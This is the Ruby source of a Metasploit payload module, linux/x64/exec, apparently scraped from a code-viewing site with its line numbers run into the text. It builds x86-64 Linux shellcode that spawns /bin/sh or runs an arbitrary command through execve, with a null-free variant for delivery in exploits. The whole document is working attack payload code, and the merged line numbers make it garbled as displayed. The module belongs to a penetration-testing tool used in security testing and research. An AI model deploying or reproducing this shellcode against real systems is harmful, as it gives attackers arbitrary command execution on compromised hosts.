Path: blob/master/modules/payloads/singles/linux/x64/exec.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 4478include Msf::Payload::Single9include Msf::Payload::Linux::X64::Prepends1011def initialize(info = {})12super(13merge_info(14info,15'Name' => 'Linux Execute Command',16'Description' => 'Execute an arbitrary command or just a /bin/sh shell',17'Author' => [18'ricky',19'Geyslan G. Bem <geyslan[at]gmail.com>'20],21'License' => MSF_LICENSE,22'Platform' => 'linux',23'Arch' => ARCH_X6424)25)2627register_options(28[29OptString.new('CMD', [ false, 'The command string to execute' ]),30]31)32register_advanced_options(33[34OptBool.new('NullFreeVersion', [ true, 'Null-free shellcode version', false ])35]36)37end3839def generate(_opts = {})40cmd = datastore['CMD'] || ''41nullfreeversion = datastore['NullFreeVersion']4243if cmd.empty?44#45# Builds the exec payload which executes a /bin/sh shell.46# execve("/bin/sh", NULL, NULL)47#48if nullfreeversion49# 22 bytes (null-free)50payload = <<-EOS51mov rax, 0x68732f6e69622f2f52cdq ; edx = NULL5354push rdx55push rax56push rsp57pop rdi ; "//bin/sh"5859push rdx60pop rsi ; NULL6162push 0x3b63pop rax6465syscall ; execve("//bin/sh", NULL, NULL)66EOS6768else69# 21 bytes (not null-free)70payload = <<-EOS71mov rax, 0x68732f6e69622f72cdq ; edx = NULL7374push rax75push rsp76pop rdi ; "/bin/sh"7778push rdx79pop rsi ; NULL8081push 0x3b82pop rax8384syscall ; execve("/bin/sh", NULL, NULL)85EOS86end87else88#89# Dynamically builds the exec payload based on the user's options.90# execve("/bin/sh", ["/bin/sh", "-c", "CMD"], NULL)91#92pushw_c_opt = 'dd 0x632d6866' # pushw 0x632d (metasm doesn't support pushw)9394if nullfreeversion95if cmd.length > 0xffff96raise RangeError, 'CMD length has to be smaller than %d' % 0xffff, caller97end9899if cmd.length <= 0xff # 255100breg = 'bl'101else102breg = 'bx'103if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes104cmd += ' '105end106end107mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"108109# 48 bytes without cmd (null-free)110payload = <<-EOS111mov rax, 0x68732f6e69622f2f112cdq ; edx = NULL113114jmp tocall ; jmp/call/pop cmd address115afterjmp:116pop rbp ; *CMD*117118push rdx119pop rbx120#{mov_cmd_len_to_breg} ; mov (byte/word) (bl/bx), cmd.length121mov [rbp + rbx], dl ; NUL '\0' terminate cmd122123push rdx124#{pushw_c_opt}125push rsp126pop rsi ; "-c"127128push rdx129push rax130push rsp131pop rdi ; "//bin/sh"132133push rdx ; NULL134push rbp ; *CMD*135push rsi ; "-c"136push rdi ; "//bin/sh"137push rsp138pop rsi ; ["//bin/sh", "-c", "*CMD*"]139140push 0x3b141pop rax142143syscall ; execve("//bin/sh", ["//bin/sh", "-c", "*CMD*"], NULL)144tocall:145call afterjmp146db "#{cmd}" ; arbitrary command147EOS148else149# 37 bytes without cmd (not null-free)150payload = <<-EOS151mov rax, 0x68732f6e69622f152cdq ; edx = NULL153154push rax155push rsp156pop rdi ; "/bin/sh"157158push rdx159#{pushw_c_opt}160push rsp161pop rsi ; "-c"162163push rdx ; NULL164call continue165db "#{cmd}", 0x00 ; arbitrary command166continue:167push rsi ; "-c"168push rdi ; "/bin/sh"169push rsp170pop rsi ; ["/bin/sh", "-c", "*CMD*"]171172push 0x3b173pop rax174175syscall ; execve("/bin/sh", ["/bin/sh", "-c", "*CMD*"], NULL)176EOS177end178end179Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string180end181end182183184